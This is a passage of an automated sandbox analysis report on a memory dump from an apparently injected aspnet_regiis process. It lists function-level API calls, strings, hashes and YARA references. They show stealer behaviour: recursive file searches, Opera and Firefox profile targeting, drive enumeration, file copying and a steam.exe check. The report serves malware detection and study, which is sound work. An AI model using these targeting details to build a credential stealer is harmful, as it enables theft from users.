                                                                                                                                                                                • Part of subcall function 02A16E97: CreateThread.KERNEL32(00000000,00000000,02A16DC6,?,00000000,00000000), ref: 02A16F36
                                                                                                                                                                                • Part of subcall function 02A16E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 02A16F3E
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A11D92: GetFileAttributesA.KERNEL32(?,?,?,02A0DA7F,?,?,?), ref: 02A11D99
                                                                                                                                                                                • Part of subcall function 02A11C4A: GetSystemTime.KERNEL32(?,02A36701,?), ref: 02A11C79
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                              • API String ID: 1475085387-1173974218
                                                                                                                                                                              • Opcode ID: cb6cf2cbe29d8095e917f6796d786bdc80ff0eaf475c42e79ce0c55b9fabad43
                                                                                                                                                                              • Instruction ID: b0d23e640f47af57bf7f704b5abc060cbee8b43cb25c2578104a5ad72e74ad75
                                                                                                                                                                              • Opcode Fuzzy Hash: cb6cf2cbe29d8095e917f6796d786bdc80ff0eaf475c42e79ce0c55b9fabad43
                                                                                                                                                                              • Instruction Fuzzy Hash: FD329831D812299BDF21FB24EE8978DB37AAF44354F4141E1A948B7160DF70AF898F90
                                                                                                                                                                              Function 02A1543D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 140stringfileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • wsprintfA.USER32 ref: 02A1546A
                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 02A15481
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A36A80), ref: 02A154A2
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A36A84), ref: 02A154BC
                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 02A1550D
                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 02A15520
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A15534
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A15547
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A36A88), ref: 02A15559
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A1556D
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A07FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A07FC7
                                                                                                                                                                                • Part of subcall function 02A07FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FDE
                                                                                                                                                                                • Part of subcall function 02A07FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FF5
                                                                                                                                                                                • Part of subcall function 02A07FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A0800C
                                                                                                                                                                                • Part of subcall function 02A07FAC: CloseHandle.KERNEL32(?,?,?,?,?,02A0E756,?,?,?), ref: 02A08034
                                                                                                                                                                                • Part of subcall function 02A16E97: CreateThread.KERNEL32(00000000,00000000,02A16DC6,?,00000000,00000000), ref: 02A16F36
                                                                                                                                                                                • Part of subcall function 02A16E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 02A16F3E
                                                                                                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 02A15623
                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 02A15637
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
                                                                                                                                                                              • String ID: %s\%s
                                                                                                                                                                              • API String ID: 1150833511-4073750446
                                                                                                                                                                              • Opcode ID: f3f91ce316ca85053c3d86a9104f18e7944b7973c3660d8f4aaa4e6a8e91a837
                                                                                                                                                                              • Instruction ID: 29526e89a111a2e1d8a69cdd082fa859881189b36193119c53d174560d223657
                                                                                                                                                                              • Opcode Fuzzy Hash: f3f91ce316ca85053c3d86a9104f18e7944b7973c3660d8f4aaa4e6a8e91a837
                                                                                                                                                                              • Instruction Fuzzy Hash: 1A51FBB1D4022C9BDF60DF64DC88AD9B7BDAB48310F5045E5A609E3240EB31DB95CF65
                                                                                                                                                                              Function 02A0BF4D Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 420fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,\*.*,02A3682E,02A0CC6B,?,?), ref: 02A0BFC5
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A37470), ref: 02A0BFE5
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A37474), ref: 02A0BFFF
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,Opera,02A36843,02A36842,02A36837,02A36836,02A36833,02A36832,02A3682F), ref: 02A0C08B
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,Opera GX), ref: 02A0C099
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 02A0C0A7
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                              • String ID: Opera$Opera Crypto$Opera GX$\*.*
                                                                                                                                                                              • API String ID: 2567437900-1710495004
                                                                                                                                                                              • Opcode ID: 7645916aca00fa7d46afd9061ea40dc22645ba371b7a77902aac97c70afac90e
                                                                                                                                                                              • Instruction ID: 64520ed093ee6b80e2f736400b696a4ecb43bf19af0c2146168adb82c371f5b4
                                                                                                                                                                              • Opcode Fuzzy Hash: 7645916aca00fa7d46afd9061ea40dc22645ba371b7a77902aac97c70afac90e
                                                                                                                                                                              • Instruction Fuzzy Hash: DE02E435D802299BDB61FB24EE89BDDB776AF14364F4141E1AD08B3150DF70AE898F90
                                                                                                                                                                              Function 02A15142 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 146stringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 02A151C2
                                                                                                                                                                              • _memset.LIBCMT ref: 02A151E5
                                                                                                                                                                              • GetDriveTypeA.KERNEL32(?), ref: 02A151EE
                                                                                                                                                                              • lstrcpy.KERNEL32(?,?), ref: 02A1520E
                                                                                                                                                                              • lstrcpy.KERNEL32(?,?), ref: 02A15229
                                                                                                                                                                                • Part of subcall function 02A14CC8: wsprintfA.USER32 ref: 02A14D1C
                                                                                                                                                                                • Part of subcall function 02A14CC8: FindFirstFileA.KERNEL32(?,?), ref: 02A14D33
                                                                                                                                                                                • Part of subcall function 02A14CC8: _memset.LIBCMT ref: 02A14D4F
                                                                                                                                                                                • Part of subcall function 02A14CC8: _memset.LIBCMT ref: 02A14D60
                                                                                                                                                                                • Part of subcall function 02A14CC8: StrCmpCA.SHLWAPI(?,02A369F8), ref: 02A14D81
                                                                                                                                                                                • Part of subcall function 02A14CC8: StrCmpCA.SHLWAPI(?,02A369FC), ref: 02A14D9B
                                                                                                                                                                                • Part of subcall function 02A14CC8: wsprintfA.USER32 ref: 02A14DC2
                                                                                                                                                                                • Part of subcall function 02A14CC8: StrCmpCA.SHLWAPI(?,02A3660F), ref: 02A14DD6
                                                                                                                                                                                • Part of subcall function 02A14CC8: wsprintfA.USER32 ref: 02A14DFF
                                                                                                                                                                                • Part of subcall function 02A14CC8: _memset.LIBCMT ref: 02A14E28
                                                                                                                                                                                • Part of subcall function 02A14CC8: lstrcat.KERNEL32(?,?), ref: 02A14E3D
                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 02A1524A
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A152C4
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
                                                                                                                                                                              • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                                                                              • API String ID: 441469471-147700698
                                                                                                                                                                              • Opcode ID: 7e0d7daac8db94b77e317e44ae6f08d1e3f18801fea63deb4cc93f0209dfb2b9
                                                                                                                                                                              • Instruction ID: f4c88235550a24d829b7ab8836cec40fd5b7358e7ec5f0a42db8c2d248aaf1b5
                                                                                                                                                                              • Opcode Fuzzy Hash: 7e0d7daac8db94b77e317e44ae6f08d1e3f18801fea63deb4cc93f0209dfb2b9
                                                                                                                                                                              • Instruction Fuzzy Hash: 27516BB1D4022CAFDF219F60CD84BDABBB9FB05314F404595EA49A3101EB319A99CF65
                                                                                                                                                                              Function 02A0D5C6 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 229fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,02A37570,02A368A3,?,?,?), ref: 02A0D647
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A37574), ref: 02A0D668
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A37578), ref: 02A0D682
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,prefs.js,02A3757C,?,02A368AE), ref: 02A0D70E
                                                                                                                                                                                • Part of subcall function 02A11C4A: GetSystemTime.KERNEL32(?,02A36701,?), ref: 02A11C79
                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 02A0D7E8
                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02A0D8B3
                                                                                                                                                                              • FindNextFileA.KERNELBASE(?,?), ref: 02A0D956
                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 02A0D96A
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                                                                                                              • String ID: prefs.js
                                                                                                                                                                              • API String ID: 893096357-3783873740
                                                                                                                                                                              • Opcode ID: 653e76f22c33e80a4b13f6674b642f1f2d62914737b6f87cbe14659007f2335d
                                                                                                                                                                              • Instruction ID: b10befb4bb2a97fa06e12048a81bf7f8e5e815fa437fff09b202ee6ffdf6bf57
                                                                                                                                                                              • Opcode Fuzzy Hash: 653e76f22c33e80a4b13f6674b642f1f2d62914737b6f87cbe14659007f2335d
                                                                                                                                                                              • Instruction Fuzzy Hash: CBA1E836D802289BDB61FB64EE85BCD7775AF04320F4145A5AC09B7250DF30AE998F91
                                                                                                                                                                              Function 02A0B5DF Relevance: 13.7, APIs: 9, Instructions: 217fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,02A37424,02A36822,?,?,?), ref: 02A0B657
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A37428), ref: 02A0B678
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A3742C), ref: 02A0B692
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A37430,?,02A36823), ref: 02A0B71F
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 02A0B780
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                                • Part of subcall function 02A0ABE5: CopyFileA.KERNEL32(?,?,00000001), ref: 02A0AC8A
                                                                                                                                                                              • FindNextFileA.KERNELBASE(?,?), ref: 02A0B8EB
                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 02A0B8FF
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3801961486-0
                                                                                                                                                                              • Opcode ID: 45a35e3074e8114640bd534b1150e4c09396f4ec8da7bde359d7c9301f1472a6
                                                                                                                                                                              • Instruction ID: 3dddbaa03443814150641da4085fd992e50a43b4b1030329619796c955414507
                                                                                                                                                                              • Opcode Fuzzy Hash: 45a35e3074e8114640bd534b1150e4c09396f4ec8da7bde359d7c9301f1472a6
                                                                                                                                                                              • Instruction Fuzzy Hash: B3811C3588022C9BDB60FF74EE85AD97779AB04328F4546A1EC09A3150EF34DE998ED1
                                                                                                                                                                              Function 02A124A8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39processCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • __EH_prolog3_catch_GS.LIBCMT ref: 02A124B2
                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02A124D4
                                                                                                                                                                              • Process32First.KERNEL32(00000000,00000128), ref: 02A124E4
                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 02A124F6
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,steam.exe), ref: 02A12508
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02A12521
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
